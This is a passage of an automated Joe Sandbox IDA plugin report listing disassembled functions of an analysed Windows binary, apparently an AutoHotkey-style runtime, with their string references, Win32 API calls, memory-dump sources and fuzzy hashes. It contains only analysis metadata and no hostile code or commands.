Function 00432050 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 139COMMON

Download Yara Rule

Strings

ExStyle, xrefs: 00432142
List, xrefs: 004320F7
PID, xrefs: 00432093
Hwnd, xrefs: 004321AF
ControlList, xrefs: 0043218F
IDLast, xrefs: 0043207A
MinMax, xrefs: 00432110
Count, xrefs: 004320DE
ProcessPath, xrefs: 004320C5
Style, xrefs: 00432129
Transparent, xrefs: 0043215B
ProcessName, xrefs: 004320AC
TransColor, xrefs: 00432174

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ControlList$Count$ExStyle$Hwnd$IDLast$List$MinMax$PID$ProcessName$ProcessPath$Style$TransColor$Transparent
API String ID: 0-142654100
Opcode ID: e1f7696557a757b1be6a227d3907186ff8005e9cc90e219acf74c0a235bfbfed
Instruction ID: aaea5904139ecbee6dd6acc4abc047956414b4f81cebe6d493848dd937a5d8be
Opcode Fuzzy Hash: e1f7696557a757b1be6a227d3907186ff8005e9cc90e219acf74c0a235bfbfed
Instruction Fuzzy Hash: 6E31B662B4962121FE61302D7E02BDB25480B3631AF564467FD04D5386F79DCD8642EE

Function 00439DF0 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 359COMMON

Download Yara Rule

Strings

Icon, xrefs: 00439F80
exe, xrefs: 00439F0C
ico, xrefs: 00439EFA
dll, xrefs: 00439F1E
Trans, xrefs: 00439FC7

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Icon$Trans$dll$exe$ico
API String ID: 0-2549557054
Opcode ID: b872008c0c62ebc02138b528a65a248c04a4d5ef3f5147ed72dba3be7b31764e
Instruction ID: 64787558aa936880ab93ab38e1036709cff572e4d0eb0048c2e6a83c3d6d86d2
Opcode Fuzzy Hash: b872008c0c62ebc02138b528a65a248c04a4d5ef3f5147ed72dba3be7b31764e
Instruction Fuzzy Hash: 61B14671A483406BDB20AF318C927AB37D59B49344F18692FF8C59B382E67D8C15879F

Function 00437C80 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 312COMMON

Download Yara Rule

Strings

Parameter #1 invalid., xrefs: 00437CA2
+-^, xrefs: 00437EDF
Off, xrefs: 00437D98

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: +-^$Off$Parameter #1 invalid.
API String ID: 0-3419364491
Opcode ID: b8a3a9ccde26e5bb8d77285d39ca948bee13aefd3d827bf784c3a7f5d50b6dd0
Instruction ID: 5a802e206847bfc0307099a518a5b368b12bef1963cabf1eff6917ff15bdc2b2
Opcode Fuzzy Hash: b8a3a9ccde26e5bb8d77285d39ca948bee13aefd3d827bf784c3a7f5d50b6dd0
Instruction Fuzzy Hash: CA9160B260C20567D730A738DC46FAB3B999B89360F14163BF9C5972C2D66DDC0582BE

Function 00446180 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 004461DC

Strings

Char, xrefs: 00446287
Int, xrefs: 0044621F
Double, xrefs: 004462D5
Ptr, xrefs: 00446253
WStr, xrefs: 00446309
Short, xrefs: 0044626D
*pP, xrefs: 004461F6
Int64, xrefs: 004462A1
Float, xrefs: 004462BB
AStr, xrefs: 004462EF
Str, xrefs: 00446239

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: *pP$AStr$Char$Double$Float$Int$Int64$Ptr$Short$Str$WStr
API String ID: 2961919466-313837492
Opcode ID: d25aa7627c4a7e60785e0478b584eac79553a0a1f4dca62824431b9cf457825d
Instruction ID: aab6018ba3ac9cbc6cd5d6315b5f88cb5855d14a1cf1792f0eb73b847e418eb1
Opcode Fuzzy Hash: d25aa7627c4a7e60785e0478b584eac79553a0a1f4dca62824431b9cf457825d
Instruction Fuzzy Hash: 6F618C7254834156EB10DE199C816EF7BC49B86321F98486FEC4447342E37ED98D83AB

Function 00433604 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 184windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00433645
SendMessageA.USER32(00000000,00000404,00000000,0000002C), ref: 004336D0
SendMessageA.USER32(00000000,0000041F,00000000,?), ref: 004336FB
SendMessageA.USER32(00000000,00000418,00000000,?), ref: 0043371B
SendMessageA.USER32(00000000,00000412,00000000,?), ref: 0043373A
SendMessageA.USER32(00000000,0000040C,00000000,?), ref: 0043376B
GetWindowRect.USER32(00000000,?), ref: 00433785
SendMessageA.USER32(00000000,00000412,00000000,?), ref: 0043381F
SendMessageA.USER32(00000000,00000411,00000001,?), ref: 0043382E

Strings

, xrefs: 00433662
,, xrefs: 0043365A
tooltips_class32, xrefs: 004336A4

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$RectWindow_memset
String ID: $,$tooltips_class32
API String ID: 1972968356-1480582750
Opcode ID: b2f73a7b191ca8eab627209eb0ab59e9e43bc0dba8fe0ec388846adefca94f18
Instruction ID: e52322288e0e0a49dc69a80722fa496154f2dba5b4b08f796c944a45ed81b2e2
Opcode Fuzzy Hash: b2f73a7b191ca8eab627209eb0ab59e9e43bc0dba8fe0ec388846adefca94f18
Instruction Fuzzy Hash: 486171B0608344AFE310CF55CC81F6BBBE5EBC9704F10892EF68496291D7B4A945CB5A

Function 00431DD0 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 91COMMON

Download Yara Rule

Strings

Status, xrefs: 00431E87
List, xrefs: 00431DE1
StatusCD, xrefs: 00431E9F
Cap, xrefs: 00431EC9
Capacity, xrefs: 00431EB7
Type, xrefs: 00431E6F
Label, xrefs: 00431E25
SetLabel:, xrefs: 00431E3F
Serial, xrefs: 00431E57
FileSystem, xrefs: 00431DF9

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Cap$Capacity$FileSystem$Label$List$Serial$SetLabel:$Status$StatusCD$Type
API String ID: 0-1446549340
Opcode ID: 375a5a3feeaa930a943b32d8d9945db53b0a04ee8139088198fb4e04a470e56f
Instruction ID: dc6e17c65baf7cecdff469e565fee5eb10541c5e4ce92bd2ed15fd792c9d169a
Opcode Fuzzy Hash: 375a5a3feeaa930a943b32d8d9945db53b0a04ee8139088198fb4e04a470e56f
Instruction Fuzzy Hash: 56115E85F4561122FE11312A1C13BAF284D4F26B0AFE554BBBC04D4392F75EDE14D2AE

Function 0040254F Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 463windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,?), ref: 00402611
GetWindowLongA.USER32(?,000000EC), ref: 00402796
_memset.LIBCMT ref: 00402A8B
SendMessageA.USER32 ref: 00402AC0

Strings

s, xrefs: 004029D0
I, xrefs: 00402A16
call, xrefs: 00402C12

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID: I$call$s
API String ID: 830647256-1256817654
Opcode ID: 10a352d663ef41373f0b8b701c349d423444e7c8b8998d20b364eafa1c8c6317
Instruction ID: 365284dd0592b156e396f6579f027e82da823e56dbd832f3b4a75adb9e38b5e4
Opcode Fuzzy Hash: 10a352d663ef41373f0b8b701c349d423444e7c8b8998d20b364eafa1c8c6317
Instruction Fuzzy Hash: 9B12A0B06083408FD725DF18C988B9BBBE5BF88304F14896EE4899B3D1D7B9D845CB56

Function 00420C30 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 461COMMON

Download Yara Rule

APIs

__snprintf.LIBCMT ref: 00420E63

Strings

base.__Init(), xrefs: 00421080
Duplicate declaration., xrefs: 00420FC2
Out of memory., xrefs: 00420FDD
this, xrefs: 00420E38, 00420E4D
Invalid class variable declaration., xrefs: 00420F8C, 0042100E
Declaration too long., xrefs: 00420FF5
__Init(), xrefs: 00421021
Unknown class var., xrefs: 00420FA7
%s.%.*s := %.*s, , xrefs: 00420E53

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __snprintf
String ID: %s.%.*s := %.*s, $Declaration too long.$Duplicate declaration.$Invalid class variable declaration.$Out of memory.$Unknown class var.$__Init()$base.__Init()$this
API String ID: 2633826957-645455525
Opcode ID: 97593642f5c0744c8fd1b55a9ca47bcbba474f18c211ee48ae94faf4f7f952b0
Instruction ID: 2eb808f306e631f76c9d918ec3a9fcc50363e18dab911891de15dbf83b1280ed
Opcode Fuzzy Hash: 97593642f5c0744c8fd1b55a9ca47bcbba474f18c211ee48ae94faf4f7f952b0
Instruction Fuzzy Hash: 2AF146717083509FC720CF15E480BABBBE5AB99310F94496FE9848B352D379D885CB9A

Function 00420600 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 420COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0042067D

Strings

Out of memory., xrefs: 00420A6B
Missing class name., xrefs: 004206B3
Invalid class name., xrefs: 00420712
extends, xrefs: 00420677
Full class name is too long., xrefs: 004208E9
This class definition is nested too deep., xrefs: 0042061B
Syntax error in class definition., xrefs: 00420809
__Class, xrefs: 004207CF, 00420A02
Duplicate class definition., xrefs: 00420956

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign
String ID: Duplicate class definition.$Full class name is too long.$Invalid class name.$Missing class name.$Out of memory.$Syntax error in class definition.$This class definition is nested too deep.$__Class$extends
API String ID: 3965848254-3763243221
Opcode ID: d4d8d649898cad16f3877f76ab2b5d0518d04a5cbd84fc8d20f1c803e7696527
Instruction ID: 6183e7cc58247f4f4798d137a819930bd5b8a9bf7ecdc40732e76e0eb2342491
Opcode Fuzzy Hash: d4d8d649898cad16f3877f76ab2b5d0518d04a5cbd84fc8d20f1c803e7696527
Instruction Fuzzy Hash: 6CE10F717043209FDB14DF18E480BABBBE1AB89710F84456FE8898B353D779D845CB99

Function 00443420 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

%02d, xrefs: 004435CA, 004435E5, 00443600, 0044361B, 00443652, 0044366D

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: %02d
API String ID: 0-896308400
Opcode ID: 4ff521f190ab8903e44aa24b6ee88d31d7e1fcb403e3bdda335693ee041faa6f
Instruction ID: 1ed7840b265a421e4504f227f90a66c1873edb90e104f794d55b0330028fcaf3
Opcode Fuzzy Hash: 4ff521f190ab8903e44aa24b6ee88d31d7e1fcb403e3bdda335693ee041faa6f
Instruction Fuzzy Hash: 51514DA770012025FA146BAA7C026BB7359D7D2B37B54413BF90DC1AE1F61D8B54836D

Function 0040CC34 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 136COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 0040CC89
_sprintf.LIBCMT ref: 0040CDC7

Strings

m-hook, xrefs: 0040CCD3
joypoll, xrefs: 0040CD0A
2-hooks, xrefs: 0040CCF4
(no), xrefs: 0040CE44
k-hook, xrefs: 0040CCB2
%i-%i, xrefs: 0040CDC1
%s%s%s%s%s%s, xrefs: 0040CE6C
OFF, xrefs: 0040CD38, 0040CE65

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __itow_sprintf
String ID: %i-%i$%s%s%s%s%s%s$(no)$2-hooks$OFF$joypoll$k-hook$m-hook
API String ID: 4087599471-4014595361
Opcode ID: 4f5afb440bd27b6324ea51b4097f646fd36f3c549fd2f390015e6d9618f7109d
Instruction ID: ce6210c3146c00c6883e014553c63bc3a2305c212d120a8ee8f6042d6ccbe244
Opcode Fuzzy Hash: 4f5afb440bd27b6324ea51b4097f646fd36f3c549fd2f390015e6d9618f7109d
Instruction Fuzzy Hash: C151CF71908241CBD724CF14D89066ABBE1FFA9304F1447BFE889A7391E338E941C79A

Function 0040CC32 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 135COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 0040CC89
_sprintf.LIBCMT ref: 0040CDC7

Strings

m-hook, xrefs: 0040CCD3
joypoll, xrefs: 0040CD0A
2-hooks, xrefs: 0040CCF4
(no), xrefs: 0040CE44
k-hook, xrefs: 0040CCB2
%i-%i, xrefs: 0040CDC1
%s%s%s%s%s%s, xrefs: 0040CE6C
OFF, xrefs: 0040CD38, 0040CE65

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __itow_sprintf
String ID: %i-%i$%s%s%s%s%s%s$(no)$2-hooks$OFF$joypoll$k-hook$m-hook
API String ID: 4087599471-4014595361
Opcode ID: b3643f2b6127c6345aa12a11b7f45f88eefe8a7a569930cf8b01b644b030b8df
Instruction ID: 9ca05c855c8b36b87b9cde7baef57f6c7e4ce17be1a8526a15c310e37af0d573
Opcode Fuzzy Hash: b3643f2b6127c6345aa12a11b7f45f88eefe8a7a569930cf8b01b644b030b8df
Instruction Fuzzy Hash: 0951CE71908241CBD714CF14D89066ABBE1FFA9304F1847BFE889A7391E338E941C79A

Function 00464A00 Relevance: 16.7, APIs: 11, Instructions: 216windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00464A3E
GetWindowLongA.USER32(?,000000F0), ref: 00464A6D
SendMessageA.USER32(?,?,00000000,?), ref: 00464AF6
SendMessageA.USER32(?,0000101B,?,?), ref: 00464B31
SendMessageA.USER32(?,?,00000000,00000000), ref: 00464B8D
SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00464BC3
GetWindowLongA.USER32(?,000000F0), ref: 00464BCA
SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 00464BEE
SendMessageA.USER32(?,0000130C,?,00000000), ref: 00464C10
SendMessageA.USER32(?,0000014E,00000001,?), ref: 00464C2E
SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00464C40

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: d67ad9cbd2e833141f774c0b968fd54a07269eda4b2fd77e813d6c4660d22e13
Instruction ID: 60a8d52a92d5f8b9f0839ca991aa8907423fbdb4b3de46917d595c107d825417
Opcode Fuzzy Hash: d67ad9cbd2e833141f774c0b968fd54a07269eda4b2fd77e813d6c4660d22e13
Instruction Fuzzy Hash: 2771C070208341ABDB20CF68CC91F777BE9ABC6710F244A1EF591872C1D679E845C76A

Function 00406FE0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 452COMMON

Download Yara Rule

Strings

0, xrefs: 00407140

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ce602c470fc2f249fc28ceec7e883994f3e9285443f1deb14cb241bb27ea4640
Instruction ID: 130e4a136626ee44aaed06cacab9448909b64f05deeca34460455cbb1b7d1434
Opcode Fuzzy Hash: ce602c470fc2f249fc28ceec7e883994f3e9285443f1deb14cb241bb27ea4640
Instruction Fuzzy Hash: A8F1147190C3809EE721CB748844BE77FE8AB86304F08457EE994573D2D779A84AC76B

Function 00438300 Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 429COMMON

Download Yara Rule

Strings

Parameter #2 invalid., xrefs: 00438335
%s1, xrefs: 00438551
user32, xrefs: 0043871C
0x%06X, xrefs: 00438791
GetLayeredWindowAttributes, xrefs: 00438717
0x%08X, xrefs: 004386B5

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
